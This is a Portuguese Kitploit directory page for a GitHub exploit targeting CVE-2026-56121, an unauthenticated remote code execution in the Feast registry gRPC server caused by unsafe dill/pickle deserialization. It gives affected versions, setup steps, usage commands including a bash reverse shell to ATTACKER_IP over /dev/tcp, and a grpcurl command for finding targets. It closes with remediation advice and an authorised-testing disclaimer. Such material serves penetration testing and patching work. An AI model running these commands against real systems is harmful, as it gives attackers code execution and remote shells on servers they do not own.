Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-56121_exploit | Kitploit
Ferramentas/GitHubGitHub/0xdak/cve-2026-56121_exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHub0xdak/cve-2026-56121_exploit

CVE-2026-56121_exploit

Ver Repositório
1há 29 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-56121 — Execução Remota de Código não Autenticada no Feast Registry (dill.loads)

Execução remota de código não autenticada no servidor gRPC do registry do feature store Feast.

A RPC ApplyFeatureView reconstrói um OnDemandFeatureView a partir do proto da requisição. Ao fazer isso, ela decodifica em base64 spec.user_defined_function.body e o passa para dill.loads() — antes de qualquer verificação de autorização. dill é um superconjunto de pickle, portanto um objeto cujo __reduce__ retorna (os.system, (cmd,)) executa um comando arbitrário no momento em que o servidor o desserializa. A implantação padrão vem com auth: no_auth, então basta uma única requisição gRPC não autenticada para a porta do registry.

  • Afetados: Feast < 0.63.0
  • Corrigido em: Feast 0.63.0
  • Porta padrão: 6570 (registry gRPC)
  • CWE: 502 (Desserialização de Dados Não Confiáveis)
  • Impacto: RCE como o usuário do serviço de registry (frequentemente todo o plano de controle do feature store)

Requisitos

O exploit reutiliza os protos gRPC gerados pelo próprio Feast, portanto instale uma versão vulnerável do Feast no lado do atacante:

root@kitploit:~
python3 -m venv venv && . venv/bin/activate
pip install "feast==0.62.0" grpcio

Uso

root@kitploit:~
# quick check (output appears on the SERVER, not locally)
python3 exploit.py 10.10.10.10:6570 -c "id"

# reverse shell (bash -c wrapper: os.system uses /bin/sh, which lacks /dev/tcp)
python3 exploit.py 10.10.10.10:6570 -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"'

-p/--project define o nome do projeto (padrão feature_repo). A saída do comando é exibida no stdout/journal do host do registry; portanto, use um reverse shell ou grave em um caminho legível para observar os resultados.

Identificando um alvo

O registry tem a reflexão gRPC habilitada:

root@kitploit:~
grpcurl -plaintext 10.10.10.10:6570 list
# feast.registry.RegistryServer
# grpc.health.v1.Health
# grpc.reflection.v1alpha.ServerReflection

Remediação

Atualize para Feast 0.63.0+, habilite um backend de autenticação e nunca exponha a porta gRPC do registry a redes não confiáveis.

Aviso Legal

Somente para testes de segurança autorizados e fins educacionais. Use-o apenas contra sistemas que você possui ou para os quais tem permissão explícita para testar.

Baixar ferramenta